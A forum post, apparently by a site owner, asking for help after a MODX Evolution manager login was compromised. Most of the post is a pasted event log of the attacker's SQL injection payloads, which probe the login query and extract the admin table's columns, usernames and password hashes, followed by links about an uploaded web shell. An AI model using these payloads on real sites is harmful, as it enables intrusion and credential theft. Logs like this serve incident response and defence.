Today I have discovered some new php files that were arbitrary uploaded, I thought first it is the q2a software I am using but checking the modx event log plus the manager log, I can see that the attacker came by MODX Evolution!
After entering in the system he uploaded a file stats.php
https://github.com/echteinfachtv/q2a-various/blob/master/stats.php that gave him control over the server:
MODx Parse Error from event log (how he entered the manager panel)
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = ',(("]]').]' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '') AND 6513=8505 AND ('GsiA'='GsiA' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '') AND 8413=8413 AND ('sRCb'='sRCb' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '') AND (SELECT 2315 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT (CASE WHEN (2315=2315) THEN 1 ELSE 0 END)),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('Knbe'='Knbe' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 2315 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT (CASE WHEN (2315=2315) THEN 1 ELSE 0 END)),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Pdru'='Pdru' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = ''; SELECT SLEEP(5)-- ' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' ORDER BY 5530#' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' ORDER BY 6#' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' ORDER BY 10#' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' ORDER BY 5#' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 4465 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT (CASE WHEN (8002 = 8002) THEN 1 ELSE 0 END)),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Payy'='Payy' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 8664 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,50)),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xeaz'='xeaz' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 6131 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d6f64785f6d616e616765725f7573657273 AND table_schema=0x64623334383237375f37 LIMIT 0,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'FPmo'='FPmo' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 9887 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d6f64785f6d616e616765725f7573657273 AND table_schema=0x64623334383237375f37 LIMIT 0,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'XLgX'='XLgX' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 5834 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d6f64785f6d616e616765725f7573657273 AND table_schema=0x64623334383237375f37),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'AEwg'='AEwg' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 6947 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d6f64785f6d616e616765725f7573657273 AND table_schema=0x64623334383237375f37 LIMIT 1,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'kzfw'='kzfw' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 1761 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d6f64785f6d616e616765725f7573657273 AND table_schema=0x64623334383237375f37 LIMIT 1,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'seHf'='seHf' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 4478 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d6f64785f6d616e616765725f7573657273 AND table_schema=0x64623334383237375f37 LIMIT 2,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'KLre'='KLre' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 1391 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d6f64785f6d616e616765725f7573657273 AND table_schema=0x64623334383237375f37 LIMIT 2,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'PjWz'='PjWz' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 6916 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM db348277_7.modx_manager_users),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YArq'='YArq' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 4628 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(id AS CHAR),0x20)),1,50) FROM db348277_7.modx_manager_users ORDER BY id LIMIT 0,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'lZHc'='lZHc' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 7605 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),1,50) FROM db348277_7.modx_manager_users ORDER BY id LIMIT 0,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yDor'='yDor' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = '' AND (SELECT 8409 FROM(SELECT COUNT(*),CONCAT(0x3a6c776b3a,(SELECT MID((IFNULL(CAST(username AS CHAR),0x20)),1,50) FROM db348277_7.modx_manager_users ORDER BY id LIMIT 0,1),0x3a6d6f723a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ZeOE'='ZeOE' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = ''' LIMIT 1;
SQL: SELECT usr.id, usr.username, attr.email, MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) AS hash FROM `modx_manager_users` usr INNER JOIN `modx_user_attributes` attr ON usr.id = attr.internalKey WHERE MD5(CONCAT(usr.username,usr.password,'4dc7941b12ee7','2013160')) = ''' LIMIT 1;
Later on the attacker uploaded more files, you can read about here:
http://stackoverflow.com/questions/17945523/our-q2a-forum-got-hacked-by-ccteam-what-are-these-php-files-doing
http://stackoverflow.com/questions/17946838/has-anybody-heard-about-blackhats-with-kernel-exploits-exploit-enlightenment
http://question2answer.org/qa/26227/hacked-russians-files-include-plugin-theme-folder-discovered
Please help, how can I prevent another attack?
I have no idea which settings the attacker has changed within modx, can I see full details from the event log?
Thank you!
[ed. note: kajus99 last edited this post 10 years, 8 months ago.]